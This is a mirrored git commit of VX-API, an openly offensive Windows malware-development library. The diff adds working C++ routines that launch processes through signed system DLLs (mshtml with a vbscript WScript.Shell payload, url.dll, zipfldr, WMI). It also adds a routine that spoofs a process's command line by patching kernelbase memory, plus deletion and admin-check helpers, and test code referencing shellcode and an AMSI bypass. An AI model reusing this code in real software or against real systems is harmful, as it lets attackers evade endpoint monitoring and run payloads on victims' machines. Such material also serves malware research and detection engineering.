Mirrors
/
vxug-VXAPI
mirror of https://github.com/vxunderground/VX-API
6
0
Fork 0
Code Issues Projects Releases Wiki Activity

2.0.709 

Version: 2.0.709
This commit is contained in:
vxunderground 2023-03-28 04:13:24 -05:00
parent f2f28f9a55
commit 1620dd9894
24 changed files with 844 additions and 165 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

11
README.md
View File

@ -3,7 +3,7 @@ managed by [vx-underground](https://vx-underground.org) | follow us on [Twitter]
# VX-API
Version: 2.0.684
Version: 2.0.709
Developer: smelly__vx
@ -92,6 +92,8 @@ You're free to use this in any manner you please. You do not need to use this en
| XpressMaximumDecompressBuffer | smelly__vx |
| XpressStandardCompressBuffer | smelly__vx |
| XpressStandardDecompressBuffer | smelly__vx |
| MpfExtractMaliciousPayloadFromZipFileNoPassword | Codu |
| ExtractFilesFromCabIntoTarget | smelly__vx |
## Error Handling
@ -137,6 +139,7 @@ You're free to use this in any manner you please. You do not need to use this en
| GetPidFromPidBruteForcing | modexp |
| GetPidFromNtQueryFileInformation | modexp, Lloyd Davies, Jonas Lyk |
| GetPidFromPidBruteForcingExW | smelly__vx, LLoyd Davies, Jonas Lyk, modexp |
| IsProcessRunningAsAdmin2 | smelly__vx |
## Helper Functions
@ -144,7 +147,6 @@ You're free to use this in any manner you please. You do not need to use this en
| ------------- | --------------- |
| CreateLocalAppDataObjectPath | smelly__vx |
| CreateWindowsObjectPath | smelly__vx |
| DeleteFileWithCreateFileFlag | smelly__vx |
| GetCurrentDirectoryFromUserProcessParameters | smelly__vx |
| GetCurrentProcessIdFromTeb | ReactOS |
| GetCurrentUserSid | Giovanni Dicanio |
@ -212,9 +214,7 @@ You're free to use this in any manner you please. You do not need to use this en
| MpfGetLsaPidFromRegistry | modexp |
| MpfGetLsaPidFromNamedPipe | modexp |
| MpfComMonitorChromeSessionOnce | smelly__vx |
| MpfExecute64bitPeBinaryInMemoryFromByteArrayNoReloc | aaaddress1 |
| MpfLolExecuteRemoteBinaryByAppInstaller | Wade Hickey |
| MpfExtractMaliciousPayloadFromZipFileNoPassword | Codu |
| MpfPiControlInjection | SafeBreach Labs |
| MpfPiQueueUserAPCViaAtomBomb | SafeBreach Labs |
| MpfPiWriteProcessMemoryCreateRemoteThread | SafeBreach Labs |
@ -294,6 +294,8 @@ You're free to use this in any manner you please. You do not need to use this en
| ------------- | --------------- |
| CopyFileViaSetupCopyFile | smelly__vx |
| CreateFileFromDsCopyFromSharedFile | Jonas Lyk |
| DeleteDirectoryAndSubDataViaDelNode | smelly__vx |
| DeleteFileWithCreateFileFlag | smelly__vx |
## Process Creation
@ -314,6 +316,7 @@ You're free to use this in any manner you please. You do not need to use this en
| CreateProcessFromPcwUtil | smelly__vx |
| CreateProcessFromShdocVwOpenUrl | smelly__vx |
| CreateProcessFromShell32ShellExecRun | smelly__vx |
| MpfExecute64bitPeBinaryInMemoryFromByteArrayNoReloc | aaaddress1 |
## Rad98 Hooking Engine

3
VX-API/CaplockString.cpp
View File

@ -24,4 +24,5 @@ PWCHAR CaplockStringW(_In_ PWCHAR Ptr)
sv++;
}
return Ptr;
}
}

1
VX-API/CopyFileViaSetupCopyFile.cpp
View File

@ -5,6 +5,7 @@ BOOL CopyFileViaSetupCopyFileW(LPCWSTR Source, LPCWSTR Destination)
return SetupDecompressOrCopyFileW(Source, Destination, FILE_COMPRESSION_NONE);
}
BOOL CopyFileViaSetupCopyFileA(LPCSTR Source, LPCSTR Destination)
{
WCHAR wSource[MAX_PATH * sizeof(WCHAR)] = { 0 };

53
VX-API/CreateProcessFromINFSectionInstallStringNoCab3.cpp
View File

@ -1,53 +0,0 @@
#include "Win32Helper.h"
/*
Example .inf file
_______________
///////////////
; ----------------------------------------------------------------------
; Required Sections
; ----------------------------------------------------------------------
[Version]
Signature=$CHICAGO$
Provider=test
Class=Printer
[Manufacturer]
HuntressLabs=ModelsSection,NTx86,NTia64,NTamd64
; ----------------------------------------------------------------------
; Models Section
; ----------------------------------------------------------------------
[ModelsSection.NTx86]
UnregisterDlls = Squiblydoo
[ModelsSection.NTia64]
UnregisterDlls = Squiblydoo
[ModelsSection.NTamd64]
UnregisterDlls = Squiblydoo
; ----------------------------------------------------------------------
; Support Sections
; ----------------------------------------------------------------------
[DefaultInstall]
UnregisterDlls = Squiblydoo
[Squiblydoo]
calc.exe
_______________
///////////////
*/
BOOL CreateProcessFromINFSectionInstallStringNoCab3W(LPCWSTR PathToInfFile, LPCWSTR NameOfSection)
{
return FALSE;
}
BOOL CreateProcessFromINFSectionInstallStringNoCab3A(LPCSTR PathToInfFile, LPCSTR NameOfSection)
{
return FALSE;
}

43
VX-API/CreateProcessFromMSHTML.cpp Normal file
View File

@ -0,0 +1,43 @@
#include "Win32Helper.h"
//CreateProcessFromMsHTMLW(L"vbscript:CreateObject(\"WScript.Shell\").Run(\"calc.exe\",0)(Window.Close)")
//CreateProcessFromMsHTMLW(L"\"javascript:close((V=(v=new ActiveXObject('SAPI.SpVoice')).GetVoices()).count&&v.Speak('Hello! I am '+V(0).GetAttribute('Gender')))\"");
BOOL CreateProcessFromMsHTMLW(LPCWSTR MshtaCommand)
{
typedef HRESULT(WINAPI* RUNHTMLAPPLICATION)(HINSTANCE, HINSTANCE, LPSTR, INT);
RUNHTMLAPPLICATION RunHtmlApplication = NULL;
HMODULE hMod = NULL;
WCHAR wBinaryBuffer[MAX_PATH * sizeof(WCHAR)] = { 0 };
WCHAR Payload[MAX_PATH * sizeof(WCHAR) * 2] = { 0 };
BOOL bFlag = FALSE;
if (GetProcessPathFromLoaderLoadModuleW(MAX_PATH * sizeof(WCHAR), wBinaryBuffer) == 0)
goto EXIT_ROUTINE;
StringConcatW(Payload, L"\"");
StringConcatW(Payload, wBinaryBuffer);
StringConcatW(Payload, L"\"");
StringConcatW(Payload, L" ");
StringConcatW(Payload, MshtaCommand);
if (!RtlSetBaseUnicodeCommandLine(Payload))
goto EXIT_ROUTINE;
hMod = LoadLibraryW(L"mshtml.dll");
if (hMod == NULL)
goto EXIT_ROUTINE;
RunHtmlApplication = (RUNHTMLAPPLICATION)GetProcAddressA((DWORD64)hMod, "RunHTMLApplication");
if (!RunHtmlApplication)
goto EXIT_ROUTINE;
RunHtmlApplication(NULL, NULL, NULL, 0);
bFlag = TRUE;
EXIT_ROUTINE:
return bFlag;
}

1
VX-API/CreateProcessFromShdocVwOpenUrl.cpp
View File

@ -30,6 +30,7 @@ EXIT_ROUTINE:
return bFlag;
}
BOOL CreateProcessFromShdocVwOpenUrlA(LPCSTR PathToUrlFile)
{
typedef VOID(WINAPI* OPENURL)(HWND, HINSTANCE, LPCSTR);

4
VX-API/CreateProcessFromShell32ShellExecRunDll.cpp → VX-API/CreateProcessFromShell32ShellExecRun.cpp
View File

@ -1,6 +1,6 @@
#include "Win32Helper.h"
BOOL CreateProcessFromShell32ShellExecRunDllW(LPCWSTR PathToFile)
BOOL CreateProcessFromShell32ShellExecRunW(LPCWSTR PathToFile)
{
typedef VOID(WINAPI* SHELLEXEC_RUNDLLW)(HWND, HINSTANCE, LPCWSTR, INT);
SHELLEXEC_RUNDLLW ShellExec_RunDllW = NULL;
@ -25,7 +25,7 @@ EXIT_ROUTINE:
return bFlag;
}
BOOL CreateProcessFromShell32ShellExecRunDllA(LPCSTR PathToFile)
BOOL CreateProcessFromShell32ShellExecRunA(LPCSTR PathToFile)
{
typedef VOID(WINAPI* SHELLEXEC_RUNDLLA)(HWND, HINSTANCE, LPCSTR, INT);
SHELLEXEC_RUNDLLA ShellExec_RunDllA = NULL;

59
VX-API/CreateProcessFromUrlFileProtocolHandler.cpp Normal file
View File

@ -0,0 +1,59 @@
#include "Win32Helper.h"
BOOL CreateProcessFromUrlFileProtocolHandlerW(LPCWSTR PathToUrlFile)
{
typedef HINSTANCE(WINAPI* FILEPROTOCOLHANDLERA)(HWND, HINSTANCE, LPCSTR, INT);
FILEPROTOCOLHANDLERA FileProtocolHandlerA = NULL;
HMODULE hMod = NULL;
BOOL bFlag = FALSE;
CHAR ccPathToUrlFile[MAX_PATH] = { 0 };
if (WCharStringToCharString(ccPathToUrlFile, (PWCHAR)PathToUrlFile, StringLengthW(PathToUrlFile)) == 0)
goto EXIT_ROUTINE;
hMod = LoadLibraryW(L"url.dll");
if (hMod == NULL)
goto EXIT_ROUTINE;
FileProtocolHandlerA = (FILEPROTOCOLHANDLERA)GetProcAddressA((DWORD64)hMod, "FileProtocolHandlerA");
if (!FileProtocolHandlerA)
goto EXIT_ROUTINE;
FileProtocolHandlerA(NULL, NULL, ccPathToUrlFile, SW_SHOW);
bFlag = TRUE;
EXIT_ROUTINE:
if (hMod)
FreeLibrary(hMod);
return bFlag;
}
BOOL CreateProcessFromUrlFileProtocolHandlerA(LPCSTR PathToUrlFile)
{
typedef HINSTANCE(WINAPI* FILEPROTOCOLHANDLERA)(HWND, HINSTANCE, LPCSTR, INT);
FILEPROTOCOLHANDLERA FileProtocolHandlerA = NULL;
HMODULE hMod = NULL;
BOOL bFlag = FALSE;
hMod = LoadLibraryW(L"url.dll");
if (hMod == NULL)
goto EXIT_ROUTINE;
FileProtocolHandlerA = (FILEPROTOCOLHANDLERA)GetProcAddressA((DWORD64)hMod, "FileProtocolHandlerA");
if (!FileProtocolHandlerA)
goto EXIT_ROUTINE;
FileProtocolHandlerA(NULL, NULL, PathToUrlFile, SW_SHOW);
bFlag = TRUE;
EXIT_ROUTINE:
if (hMod)
FreeLibrary(hMod);
return bFlag;
}

59
VX-API/CreateProcessFromUrlOpenUrl.cpp Normal file
View File

@ -0,0 +1,59 @@
#include "Win32Helper.h"
BOOL CreateProcessFromUrlOpenUrlW(LPCWSTR PathToUrlFile)
{
typedef VOID(WINAPI* OPENURL)(HWND, HINSTANCE, LPCSTR);
OPENURL OpenUrl = NULL;
HMODULE hMod = NULL;
BOOL bFlag = FALSE;
CHAR ccPathToUrlFile[MAX_PATH] = { 0 };
if (WCharStringToCharString(ccPathToUrlFile, (PWCHAR)PathToUrlFile, StringLengthW(PathToUrlFile)) == 0)
goto EXIT_ROUTINE;
hMod = LoadLibraryW(L"url.dll");
if (hMod == NULL)
goto EXIT_ROUTINE;
OpenUrl = (OPENURL)GetProcAddressA((DWORD64)hMod, "OpenURL");
if (!OpenUrl)
goto EXIT_ROUTINE;
OpenUrl(NULL, NULL, ccPathToUrlFile);
bFlag = TRUE;
EXIT_ROUTINE:
if (hMod)
FreeLibrary(hMod);
return bFlag;
}
BOOL CreateProcessFromUrlOpenUrlA(LPCSTR PathToUrlFile)
{
typedef VOID(WINAPI* OPENURL)(HWND, HINSTANCE, LPCSTR);
OPENURL OpenUrl = NULL;
HMODULE hMod = NULL;
BOOL bFlag = FALSE;
hMod = LoadLibraryW(L"url.dll");
if (hMod == NULL)
goto EXIT_ROUTINE;
OpenUrl = (OPENURL)GetProcAddressA((DWORD64)hMod, "OpenUrl");
if (!OpenUrl)
goto EXIT_ROUTINE;
OpenUrl(NULL, NULL, PathToUrlFile);
bFlag = TRUE;
EXIT_ROUTINE:
if (hMod)
FreeLibrary(hMod);
return bFlag;
}

115
VX-API/CreateProcessFromWmiWin32_Process.cpp Normal file
View File

@ -0,0 +1,115 @@
#include "Win32Helper.h"
DWORD CreateProcessFromWmiWin32_ProcessW(LPCWSTR BinaryPath)
{
HRESULT Result;
IWbemLocator* Locator = NULL;
IWbemServices* Services = NULL;
IWbemClassObject* Win32ProcessStartupObject = NULL;
IWbemClassObject* StartupInstance = NULL;
IWbemClassObject* Win32ProcessObject = NULL;
IWbemClassObject* ParameterInformationObject = NULL;
IWbemClassObject* ParametersObject = NULL;
IWbemClassObject* StartupResponseObject = NULL;
VARIANT varCommand;
VARIANT vtDispatch;
BOOL bFlag = FALSE;
DWORD dwError = ERROR_SUCCESS;
Result = CoInitializeEx(0, COINIT_MULTITHREADED);
if (!SUCCEEDED(Result))
goto EXIT_ROUTINE;
Result = CoCreateInstance(CLSID_WbemLocator, NULL, 1, IID_IWbemLocator, (LPVOID*)&Locator);
if (!SUCCEEDED(Result))
goto EXIT_ROUTINE;
Result = Locator->ConnectServer((BSTR)L"ROOT\\CIMV2", NULL, NULL, 0, NULL, 0, 0, &Services);
if (!SUCCEEDED(Result))
goto EXIT_ROUTINE;
Result = CoSetProxyBlanket(Services, RPC_C_AUTHN_WINNT, RPC_C_AUTHZ_NONE, NULL, RPC_C_AUTHN_LEVEL_CALL, RPC_C_IMP_LEVEL_IMPERSONATE, NULL, EOAC_NONE);
if (!SUCCEEDED(Result))
goto EXIT_ROUTINE;
Result = Services->GetObjectW((BSTR)L"Win32_ProcessStartup", 0, NULL, &Win32ProcessStartupObject, NULL);
if (!SUCCEEDED(Result))
goto EXIT_ROUTINE;
Result = Win32ProcessStartupObject->SpawnInstance(0, &StartupInstance);
if (!SUCCEEDED(Result))
goto EXIT_ROUTINE;
Result = Services->GetObjectW((BSTR)L"Win32_Process", 0, NULL, &Win32ProcessObject, NULL);
if (!SUCCEEDED(Result))
goto EXIT_ROUTINE;
Result = Win32ProcessObject->GetMethod((BSTR)L"Create", 0, &ParameterInformationObject, NULL);
if (!SUCCEEDED(Result))
goto EXIT_ROUTINE;
Result = ParameterInformationObject->SpawnInstance(0, &ParametersObject);
if (!SUCCEEDED(Result))
goto EXIT_ROUTINE;
VariantInit(&varCommand);
varCommand.vt = VT_BSTR;
varCommand.bstrVal = (BSTR)BinaryPath;
Result = ParametersObject->Put((BSTR)L"CommandLine", 0, &varCommand, 0);
if (!SUCCEEDED(Result))
goto EXIT_ROUTINE;
VariantInit(&vtDispatch);
vtDispatch.vt = VT_DISPATCH;
vtDispatch.byref = StartupInstance;
Result = ParametersObject->Put((BSTR)L"ProcessStartupInformation", 0, &vtDispatch, 0);
if (!SUCCEEDED(Result))
goto EXIT_ROUTINE;
Result = Services->ExecMethod((BSTR)L"Win32_Process", (BSTR)L"Create", 0, NULL, ParametersObject, &StartupResponseObject, NULL);
if (!SUCCEEDED(Result))
goto EXIT_ROUTINE;
bFlag = TRUE;
EXIT_ROUTINE:
if (!bFlag)
{
if (Result != S_OK)
dwError = Win32FromHResult(Result);
else
dwError = GetLastErrorFromTeb();
}
if (Locator)
Locator->Release();
if (Services)
Services->Release();
if (Win32ProcessStartupObject)
Win32ProcessStartupObject->Release();
if (StartupInstance)
StartupInstance->Release();
if (Win32ProcessObject)
Win32ProcessObject->Release();
if (ParameterInformationObject)
ParameterInformationObject->Release();
if (ParametersObject)
ParametersObject->Release();
if (StartupResponseObject)
StartupResponseObject->Release();
CoUninitialize();
return dwError;
}

59
VX-API/CreateProcessFromZipfldrRouteCall.cpp Normal file
View File

@ -0,0 +1,59 @@
#include "Win32Helper.h"
BOOL CreateProcessFromZipfldrRouteCallW(LPCWSTR PathToFile)
{
typedef VOID(WINAPI* ROUTETHECALL)(HWND, HINSTANCE, LPCSTR);
ROUTETHECALL RouteTheCall = NULL;
HMODULE hMod = NULL;
BOOL bFlag = FALSE;
CHAR ccPath[MAX_PATH] = { 0 };
hMod = LoadLibraryW(L"zipfldr.dll");
if (hMod == NULL)
goto EXIT_ROUTINE;
if (WCharStringToCharString(ccPath, (PWCHAR)PathToFile, StringLengthW(PathToFile)) == NULL)
goto EXIT_ROUTINE;
RouteTheCall = (ROUTETHECALL)GetProcAddressA((DWORD64)hMod, "RouteTheCall");
if (!RouteTheCall)
goto EXIT_ROUTINE;
RouteTheCall(NULL, NULL, ccPath);
bFlag = TRUE;
EXIT_ROUTINE:
if (hMod)
FreeLibrary(hMod);
return bFlag;
}
BOOL CreateProcessFromZipfldrRouteCallA(LPCSTR PathToFile)
{
typedef VOID(WINAPI* ROUTETHECALL)(HWND, HINSTANCE, LPCSTR);
ROUTETHECALL RouteTheCall = NULL;
HMODULE hMod = NULL;
BOOL bFlag = FALSE;
hMod = LoadLibraryW(L"zipfldr.dll");
if (hMod == NULL)
goto EXIT_ROUTINE;
RouteTheCall = (ROUTETHECALL)GetProcAddressA((DWORD64)hMod, "RouteTheCall");
if (!RouteTheCall)
goto EXIT_ROUTINE;
RouteTheCall(NULL, NULL, PathToFile);
bFlag = TRUE;
EXIT_ROUTINE:
if (hMod)
FreeLibrary(hMod);
return bFlag;
}

61
VX-API/DeleteDirectoryAndSubDataViaDelNode.cpp Normal file
View File

@ -0,0 +1,61 @@
#include "Win32Helper.h"
BOOL DeleteDirectoryAndSubDataViaDelNodeW(LPCWSTR FullPathToDirectory)
{
DELNODEW DelNodeW = NULL;
HMODULE hMod = NULL;
BOOL bFlag = FALSE;
hMod = LoadLibraryW(L"advpack.dll");
if (hMod == NULL)
goto EXIT_ROUTINE;
DelNodeW = (DELNODEW)GetProcAddressA((DWORD64)hMod, "DelNodeW");
if (!DelNodeW)
goto EXIT_ROUTINE;
if (!SUCCEEDED(DelNodeW(FullPathToDirectory, 0)))
goto EXIT_ROUTINE;
bFlag = TRUE;
EXIT_ROUTINE:
if (hMod)
FreeLibrary(hMod);
return bFlag;
}
BOOL DeleteDirectoryAndSubDataViaDelNodeA(LPCSTR FullPathToDirectory)
{
DELNODEW DelNodeW = NULL;
HMODULE hMod = NULL;
BOOL bFlag = FALSE;
WCHAR ccBuffer[MAX_PATH * sizeof(WCHAR)] = {0};
if(CharStringToWCharString(ccBuffer, (PCHAR)FullPathToDirectory, StringLengthA(FullPathToDirectory)) == 0)
goto EXIT_ROUTINE;
hMod = LoadLibraryW(L"advpack.dll");
if (hMod == NULL)
goto EXIT_ROUTINE;
DelNodeW = (DELNODEW)GetProcAddressA((DWORD64)hMod, "DelNodeW");
if (!DelNodeW)
goto EXIT_ROUTINE;
if (!SUCCEEDED(DelNodeW(ccBuffer, 0)))
goto EXIT_ROUTINE;
bFlag = TRUE;
EXIT_ROUTINE:
if (hMod)
FreeLibrary(hMod);
return bFlag;
}

64
VX-API/ExtractFilesFromCabIntoTarget.cpp Normal file
View File

@ -0,0 +1,64 @@
#include "Win32Helper.h"
BOOL ExtractFilesFromCabIntoTargetW(LPCWSTR CabFile, LPCWSTR OutputDirectory)
{
EXTRACTFILESW ExtractFilesW = NULL;
HMODULE hMod = NULL;
BOOL bFlag = FALSE;
hMod = LoadLibraryW(L"advpack.dll");
if (hMod == NULL)
goto EXIT_ROUTINE;
ExtractFilesW = (EXTRACTFILESW)GetProcAddressA((DWORD64)hMod, "ExtractFilesW");
if (!ExtractFilesW)
goto EXIT_ROUTINE;
if (!SUCCEEDED(ExtractFilesW(CabFile, OutputDirectory, 0, NULL, NULL, 0)))
goto EXIT_ROUTINE;
bFlag = TRUE;
EXIT_ROUTINE:
if (hMod)
FreeLibrary(hMod);
return bFlag;
}
BOOL ExtractFilesFromCabIntoTargetA(LPCSTR CabFile, LPCSTR OutputDirectory)
{
EXTRACTFILESW ExtractFilesW = NULL;
HMODULE hMod = NULL;
BOOL bFlag = FALSE;
WCHAR ccCab[MAX_PATH * sizeof(WCHAR)] = {0};
WCHAR ccOut[MAX_PATH * sizeof(WCHAR)] = { 0 };
if (CharStringToWCharString(ccCab, (PCHAR)CabFile, StringLengthA(CabFile)) == 0)
goto EXIT_ROUTINE;
if (CharStringToWCharString(ccOut, (PCHAR)OutputDirectory, StringLengthA(OutputDirectory)) == 0)
goto EXIT_ROUTINE;
hMod = LoadLibraryW(L"advpack.dll");
if (hMod == NULL)
goto EXIT_ROUTINE;
ExtractFilesW = (EXTRACTFILESW)GetProcAddressA((DWORD64)hMod, "ExtractFilesW");
if (!ExtractFilesW)
goto EXIT_ROUTINE;
if (!SUCCEEDED(ExtractFilesW(ccCab, ccOut, 0, NULL, NULL, 0)))
goto EXIT_ROUTINE;
bFlag = TRUE;
EXIT_ROUTINE:
if (hMod)
FreeLibrary(hMod);
return bFlag;
}

16
VX-API/FunctionDeclaration.h
View File

@ -83,7 +83,15 @@ typedef NTSTATUS(NTAPI* SYSTEMFUNCTION032)(PAB_STRING, PAB_STRING);
///*******************************************
// IMAGEHLP IMPORT
//*******************************************/
typedef BOOL(WINAPI* IMAGEGETDIGESTSTREAM)(HANDLE, DWORD, LPVOID, PHANDLE);
/*******************************************
IMAGEHLP IMPORT
/*******************************************/
typedef BOOL(WINAPI* IMAGEGETDIGESTSTREAM)(HANDLE, DWORD, LPVOID, PHANDLE);
/*******************************************
ADVPACK IMPORT
/*******************************************/
typedef HRESULT(WINAPI* DELNODEW)(LPCWSTR, DWORD);
typedef BOOL(WINAPI* ISNTADMIN)(DWORD, LPDWORD);
typedef HRESULT(WINAPI* EXTRACTFILESW)(LPCWSTR, LPCWSTR, DWORD, LPCWSTR, LPVOID, DWORD);

29
VX-API/IeCreateFile.cpp Normal file
View File

@ -0,0 +1,29 @@
#include "Win32Helper.h"
HANDLE IeCreateFileW(LPCWSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile)
{
typedef HANDLE(WINAPI* IECREATEFILE)(LPCWSTR, DWORD, DWORD, LPSECURITY_ATTRIBUTES, DWORD, DWORD, HANDLE);
IECREATEFILE IeCreateFile = NULL;
IeCreateFile = (IECREATEFILE)GetProcAddressA((DWORD64)TryLoadDllMultiMethodW((PWCHAR)L"ieframe.dll"), "IECreateFile");
if (!IeCreateFile)
return NULL;
return IeCreateFile(lpFileName, dwDesiredAccess, dwShareMode, lpSecurityAttributes, dwCreationDisposition, dwFlagsAndAttributes, hTemplateFile);
}
HANDLE IeCreateFileA(LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile)
{
typedef HANDLE(WINAPI* IECREATEFILE)(LPCWSTR, DWORD, DWORD, LPSECURITY_ATTRIBUTES, DWORD, DWORD, HANDLE);
IECREATEFILE IeCreateFile = NULL;
WCHAR ccBuffer[MAX_PATH * sizeof(WCHAR)] = { 0 };
IeCreateFile = (IECREATEFILE)GetProcAddressA((DWORD64)TryLoadDllMultiMethodW((PWCHAR)L"ieframe.dll"), "IECreateFile");
if (!IeCreateFile)
return NULL;
if (CharStringToWCharString(ccBuffer, (PCHAR)lpFileName, StringLengthA(lpFileName)) == 0)
return NULL;
return IeCreateFile(ccBuffer, dwDesiredAccess, dwShareMode, lpSecurityAttributes, dwCreationDisposition, dwFlagsAndAttributes, hTemplateFile);
}

25
VX-API/IsProcessRunningAsAdmin2.cpp Normal file
View File

@ -0,0 +1,25 @@
#include "Win32Helper.h"
BOOL IsProcessRunningAsAdmin2(VOID)
{
ISNTADMIN IsNtAdmin = NULL;
HMODULE hMod = NULL;
BOOL bFlag = FALSE;
hMod = LoadLibraryW(L"advpack.dll");
if (hMod == NULL)
goto EXIT_ROUTINE;
IsNtAdmin = (ISNTADMIN)GetProcAddressA((DWORD64)hMod, "IsNTAdmin");
if (!IsNtAdmin)
goto EXIT_ROUTINE;
bFlag = IsNtAdmin(0, NULL);
EXIT_ROUTINE:
if (hMod)
FreeLibrary(hMod);
return bFlag;
}

27
VX-API/Main.cpp
View File

@ -2,15 +2,24 @@
INT main(VOID)
{
//////////////////////////////////////////////////////////////////////////
//
// The following variables are used for VX-API development and debugging,
// they do not serve any purpose and can be removed.
//
//////////////////////////////////////////////////////////////////////////
DWORD dwSize = 0;
PCHAR Buffer = GenericShellcodeOpenCalcExitThread(&dwSize);
PCHAR ppShellcodeBuffer = GenericShellcodeOpenCalcExitThread(&dwSize);
WCHAR wBuffer[MAX_PATH * sizeof(WCHAR)] = L"C:\\Windows\\System32\\calc.exe";
CHAR cBuffer[MAX_PATH] = "C:\\Windows\\System32\\calc.exe";
//////////////////////////////////////////////////////////////////////////
//
// Test area
//
//////////////////////////////////////////////////////////////////////////
//MpfSceViaSymEnumSourceFiles((PBYTE)Buffer, dwSize);
//BOOL bFlag = AmsiBypassViaPatternScan(4288);
CreateProcessFromShell32ShellExecRunDllW(L"C:\\Windows\\System32\\calc.exe");
return ERROR_SUCCESS;
}
Sleep(1);
return 0;
}

21
VX-API/RtlInitAnsiString.cpp Normal file
View File

@ -0,0 +1,21 @@
#include "StringManipulation.h"
VOID RtlInitAnsiString(_Inout_ PANSI_STRING DestinationString, _In_ PCSTR SourceString)
{
SIZE_T Size;
if (SourceString)
{
Size = StringLengthA(SourceString);
if (Size > (65535 - sizeof(CHAR))) Size = 65535 - sizeof(CHAR);
DestinationString->Length = (USHORT)Size;
DestinationString->MaximumLength = (USHORT)Size + sizeof(CHAR);
}
else
{
DestinationString->Length = 0;
DestinationString->MaximumLength = 0;
}
DestinationString->Buffer = (PCHAR)SourceString;
}

108
VX-API/RtlSetBaseUnicodeCommandLine.cpp Normal file
View File

@ -0,0 +1,108 @@
#include "Win32Helper.h"
BOOL RtlSetBaseUnicodeCommandLine(PWCHAR CommandLinePayload)
{
PIMAGE_DOS_HEADER Dos = NULL;
PIMAGE_NT_HEADERS Nt = NULL;
PIMAGE_FILE_HEADER File = NULL;
PIMAGE_OPTIONAL_HEADER Optional = NULL;
HMODULE hKernelBase = NULL;
PBYTE BaseAddress = NULL;
BOOL bFlag = FALSE;
PIMAGE_SECTION_HEADER SectionHeaderArray = NULL;
PULONG_PTR DataSegment = ERROR_SUCCESS;
DWORD NumberOfPointers = ERROR_SUCCESS;
PWSTR CommandLineString = NULL;
PSTR CommandLineStringA = NULL;
PUNICODE_STRING CommandLineUnicodeString = NULL;
PANSI_STRING CommandLineAnsiString = NULL;
PPEB Peb = GetPeb();
PLDR_MODULE Module = NULL;
hKernelBase = TryLoadDllMultiMethodW((PWCHAR)L"kernelbase.dll");
if (!hKernelBase)
goto EXIT_ROUTINE;
BaseAddress = (PBYTE)hKernelBase;
if (!RtlLoadPeHeaders(&Dos, &Nt, &File, &Optional, &BaseAddress))
goto EXIT_ROUTINE;
SectionHeaderArray = (PIMAGE_SECTION_HEADER)(ULONGLONG(Nt) + sizeof(IMAGE_NT_HEADERS));
for (DWORD dwX = 0; dwX < File->NumberOfSections; dwX++)
{
if (StringCompareA((PCHAR)SectionHeaderArray[dwX].Name, ".data") == ERROR_SUCCESS)
{
DataSegment = (PULONG_PTR)(BaseAddress + SectionHeaderArray[dwX].VirtualAddress);
NumberOfPointers = SectionHeaderArray[dwX].Misc.VirtualSize / sizeof(ULONG_PTR);
bFlag = TRUE;
break;
}
}
if (!bFlag)
goto EXIT_ROUTINE;
else
bFlag = FALSE;
CommandLineString = GetCommandLineW();
if (CommandLineString == NULL)
goto EXIT_ROUTINE;
for (DWORD dwX = 0; dwX < NumberOfPointers; dwX++)
{
CommandLineUnicodeString = (PUNICODE_STRING)&DataSegment[dwX];
__try
{
if (StringCompareW(CommandLineUnicodeString->Buffer, CommandLineString) == 0)
{
RtlInitUnicodeString(CommandLineUnicodeString, CommandLinePayload);
break;
}
}
__except (EXCEPTION_EXECUTE_HANDLER) { continue; }
}
CommandLineStringA = GetCommandLineA();
if (CommandLineStringA == NULL)
goto EXIT_ROUTINE;
for (DWORD dwX = 0; dwX < NumberOfPointers; dwX++)
{
CommandLineAnsiString = (PANSI_STRING)&DataSegment[dwX];
__try
{
if (StringCompareA(CommandLineAnsiString->Buffer, CommandLineStringA) == 0)
{
CHAR ccBuffer[MAX_PATH] = { 0 };
ANSI_STRING AnsiString = { 0 };
if (WCharStringToCharString(ccBuffer, CommandLinePayload, StringLengthW(CommandLinePayload)) == 0)
goto EXIT_ROUTINE;
RtlInitAnsiString(&AnsiString, ccBuffer);
if (CopyMemoryEx(&DataSegment[dwX], &AnsiString, sizeof(ANSI_STRING)) == NULL)
goto EXIT_ROUTINE;
break;
}
}
__except (EXCEPTION_EXECUTE_HANDLER) { continue; }
}
Module = (PLDR_MODULE)((PBYTE)Peb->LoaderData->InMemoryOrderModuleList.Flink - 16);
for (DWORD dwX = 0; TRUE; dwX++)
{
Module = (PLDR_MODULE)((PBYTE)Module->InMemoryOrderModuleList.Flink - 16);
if (Module->BaseDllName.Buffer == NULL)
break;
}
bFlag = TRUE;
EXIT_ROUTINE:
return bFlag;
}

1
VX-API/StringManipulation.h
View File

@ -30,6 +30,7 @@ VOID CharArrayToByteArrayA(_In_ PCHAR Char, _Inout_ PBYTE Byte, _In_ DWORD Lengt
VOID CharArrayToByteArrayW(_In_ PWCHAR Char, _Inout_ PBYTE Byte, _In_ DWORD Length);
VOID RtlInitUnicodeString(_Inout_ PUNICODE_STRING DestinationString, _In_ PCWSTR SourceString);
VOID RtlInitEmptyUnicodeString(_Inout_ PUNICODE_STRING UnicodeString);
VOID RtlInitAnsiString(_Inout_ PANSI_STRING DestinationString, _In_ PCSTR SourceString);
SIZE_T CharStringToWCharString(_Inout_ PWCHAR Destination, _In_ PCHAR Source, _In_ SIZE_T MaximumAllowed);
SIZE_T WCharStringToCharString(_Inout_ PCHAR Destination, _In_ PWCHAR Source, _In_ SIZE_T MaximumAllowed);
VOID ByteArrayToCharArrayA(_Inout_ PCHAR Destination, _In_ PBYTE Source, _In_ DWORD Length);

18
VX-API/VX-API.vcxproj
View File

@ -157,13 +157,17 @@
<ClCompile Include="CreateProcessFromIHxInteractiveUser.cpp" />
<ClCompile Include="CreateProcessFromINFSectionInstallStringNoCab.cpp" />
<ClCompile Include="CreateProcessFromINFSectionInstallStringNoCab2.cpp" />
<ClCompile Include="CreateProcessFromINFSectionInstallStringNoCab3.cpp" />
<ClCompile Include="CreateProcessFromINFSetupCommand.cpp" />
<ClCompile Include="CreateProcessFromIShellDispatchInvoke.cpp" />
<ClCompile Include="CreateProcessFromMSHTML.cpp" />
<ClCompile Include="CreateProcessFromPcwUtil.cpp" />
<ClCompile Include="CreateProcessFromShdocVwOpenUrl.cpp" />
